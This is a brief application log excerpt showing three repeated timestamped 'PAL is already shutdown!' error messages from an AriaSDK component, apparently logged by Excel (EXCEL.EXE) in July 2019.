2019-07-18 04:37:30.854 T#4824 <E> [AriaSDK.PAL] PAL is already shutdown!
EXCEL.EXE
2019-07-18 04:37:40.729 T#1064 <E> [AriaSDK.PAL] PAL is already shutdown!
EXCEL.EXE
2019-07-18 04:37:49.917 T#3484 <E> [AriaSDK.PAL] PAL is already shutdown!